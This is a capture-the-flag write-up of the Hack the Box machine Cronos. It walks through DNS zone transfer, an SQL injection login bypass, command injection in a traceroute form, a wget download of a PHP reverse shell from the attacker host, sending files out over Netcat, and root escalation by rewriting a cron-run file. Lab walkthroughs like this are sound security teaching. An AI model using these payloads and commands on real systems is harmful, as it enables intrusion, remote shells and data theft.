Cronos — Hack the Box Writeup
A Hack the Box machine rated Medium difficulty running Linux.
Starting out we will run our usual Nmap scan to get a sense of what is running on this box.
kali@kali:~/Documents/htb/cronos$ nmap -sC -sV -oA nmap 10.10.10.13Our output is as follows:
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-24 17:50 EDT
Nmap scan report for 10.10.10.13
Host is up (0.041s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 18:b9:73:82:6f:26:c7:78:8f:1b:39:88:d8:02:ce:e8 (RSA)
| 256 1a:e6:06:a6:05:0b:bb:41:92:b0:28:bf:7f:e5:96:3b (ECDSA)
|_ 256 1a:0e:e7:ba:00:cc:02:01:04:cd:a3:a9:3f:5e:22:20 (ED25519)
53/tcp open domain ISC BIND 9.10.3-P4 (Ubuntu Linux)
| dns-nsid:
|_ bind.version: 9.10.3-P4-Ubuntu
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.82 secondsWe see that we have SSH on port 22/tcp, DNS on 53/tcp, and Apache web server on port 80/tcp.
The DNS server is Interesting, as we see it is listening on port 53/tcp, and the TCP protocol is used when we need to transfer entire zones, thus this could reasonably lead a DNS Zone Transfer that would provide us with a map of the entire zone.
Since this is quite unusual to see, let’s check this out first before looking into the webserver. We can investigate the DNS with a few commands, and we are going to go over two of the ones I like to use here:
- NSLOOKUP: This tool allows us to connect to a server and do a reverse name server lookup
- DIG is a tool that we can use to perform a Zone Transfer
Because we found the nameserver above: ns1.cronos.htb we can remove the name server portion of the address and have the common name cronos.htb
Using this information we can use the Dig command to perform a zone transfer with the following options.
kali@kali:~$ dig axfr cronos.htb @10.10.10.13; <<>> DiG 9.11.14-3-Debian <<>> axfr cronos.htb @10.10.10.13
;; global options: +cmd
cronos.htb. 604800 IN SOA cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800
cronos.htb. 604800 IN NS ns1.cronos.htb.
cronos.htb. 604800 IN A 10.10.10.13
admin.cronos.htb. 604800 IN A 10.10.10.13
ns1.cronos.htb. 604800 IN A 10.10.10.13
www.cronos.htb. 604800 IN A 10.10.10.13
cronos.htb. 604800 IN SOA cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800
;; Query time: 39 msec
;; SERVER: 10.10.10.13#53(10.10.10.13)
;; WHEN: Mon Aug 24 22:09:08 EDT 2020
;; XFR size: 7 records (messages 1, bytes 203)
We found multiple new subdomains that would have otherwise been unknown. We need to add these domains to our /etc/hostsfile so that we can use the domains in the browsers as we would with any other website.
Make sure to use the sudo prefix to edit the host file since it requires root privileges.
Now that we have the host file updated with our found domains, we are ready to explore these domains in the browser.
cronos.htb and www.cronos.htb both return the same webpage:
All these links are to Laravel, a PHP framework that will come in handy later. The admin.cronos.htb gives us a login page, much more interesting!
We can Gobuster these sites but we will not find anything of real significance. With that being said, if we google Laravel Exploits we will see a mention of SQL injection.
Because of this, we can use a tool called SQLMAP with a login request to attempt SQLi in both fields on the login page. To get the login request we can simply run BurpSuite and turn Intercept to ON.
Going back to our webpage we make sure that we are proxying our traffic to Burp and send a request with something simple like admin:admin for credentials. Once we submit the request Burp will capture it. We can copy this into a file in our working directory and name it login.req
Now that we have the login request file we can start SQLMAP using the login request file as arguments instead of entering all the information manually with flags. The options we will be using are-r to signify we are providing a request file, and -vvvv to increase the verbosity of the output.
We let this run until we are informed that there is a SQLi vulnerability with the admin' input. We see this in the payload just before we are notified. We also see that this SQLi vulnerability is located in the USER field.
Using what we found, Let’s try creating a payload to modify the database query so that we ignore the password field by commenting it out.
We can do this because of the SQL search query looks something like this:
SELECT * FROM login WHERE USERNAME= '$user' and PASSWORD= '$pass';In the above query the input for the $user variable is not sanitized and thus we can enter SQL commands that will run on the database. We do this by entering any string for the username followed by a single quote. This single quote closes the '$user' argument early and then we can comment out the rest of the query with -- to ignore the rest of the query. Putting this all together we end up submitting something like this in the username field: admin' -- * where * can be any string or character that acts as the comment. Notice if we submit this query without the added character that the SQLi is not successful. It does not matter what we put in the password field, as the call for the password to be looked up in the database has been commented out.
Submitting this we get in and find that there is a traceroute function built into the page.
If we inspect the input field we can get a better idea of how this command is being executed.
We see that there is a simple form that executes the commands ping -c 1 and traceroute . Let’s see if we can add a command onto the end of the traceroute command using a semicolon.
We see that we have code execution on the box as user www-data. Now, let’s turn this into a shell by uploading a PHP reverse shell found in the Laudanum directory in kali. First, we must figure out if we have a method of uploading files through the command line. Something like wget or curl would work. We can see if we have either of these utilities by using the which command.
We have wget on the machine so let’s use that. Copy the reverse shell into our working directory and edit the IP and Port to our attacking machine IP and port.
To get this file onto the target machine we can host this directory and use wget to download the file onto the target machine.
Using wget we enter our IP and the port 8000 as the default port that our SimpleHTTPServer listens on as well as the name of the reverse shell.
To check and see if the file was updated, we simply run ls on the machine.
The file upload was successful! We can set up our Netcat listener on the port we set in the php-reverse-shell.php file and request the file from the server.
We were able to get a reverse shell back to our target machine! Using a python shell upgrade command we are able to get a fully interactive TTY shell with tab completion! We also used CTL+Z followed by stty raw -echo then fg to keep ourself from CTL+C'ing ourselves out of our shell.
Privilege Escalation
We can run some scripts to look for common privilege escalation opportunities. I prefer to run the LinEnum.sh script first. This script can be found on GitHub and can be downloaded using the git clone command.
We can once again use wget to upload the script to the target machine.
www-data@cronos:/$ ls
bin home lib64 opt sbin tmp vmlinuz.old
boot initrd.img lost+found proc snap usr
dev initrd.img.old media root srv var
etc lib mnt run sys vmlinuz
www-data@cronos:/$ cd tmp
www-data@cronos:/tmp$ ls
systemd-private-13a26ada00e2453388bf55c49cc7f370-systemd-timesyncd.service-3FWjSj
vmware-root
www-data@cronos:/tmp$ wget http://10.10.14.36:8000/LinEnum.sh
--2020-09-01 21:57:46-- http://10.10.14.36:8000/LinEnum.sh
Connecting to 10.10.14.36:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 46631 (46K) [text/x-sh]
Saving to: 'LinEnum.sh'LinEnum.sh 100%[===================>] 45.54K --.-KB/s in 0.1s2020-09-01 21:57:46 (337 KB/s) - 'LinEnum.sh' saved [46631/46631]www-data@cronos:/tmp$ bash LinEnum.sh > LinEnum-output.txt
We need to find a directory where we can write files with our current user creds. I like to use the /tmp directory. With the script downloaded, we just need to run it. Since the script produces a lot of output we can send it to file, that way we can keep better notes on the system. Once the script is done running we can send the output file back to our attacker machine to analyze. We can do this through Netcat.
From our attacking machine we set up a Netcat listener with the > argument to specify that we are receiving a file, and the name we want to save the file as. On the victim machine, we use Netcat to connect to our attacking machine with the < argument to indicate that we are sending a file.
Now that we have the LinEnum output on our kali machine, we can take a look through it to see if there is anything that stands out.
There is a Cron job running every minute where root executes this laravel artisan file. Since we are user www-data we most likely have access to this laravel file. If we can replace the contents of this file with a reverse shell we can get a reverse shell with root privileges.
We confirmed that we have access to this artisan file and can modify it. Now, let’s replace the contents of this file with that of php-reverse-shell.php with a new port, and set up our listener.
Save the file and open up the listening with the correct port and wait for the Cron job to run it on the new minute.
And there we have it! A root shell on Hack the Box machine Cronos. This completes the walkthrough, happy hacking!
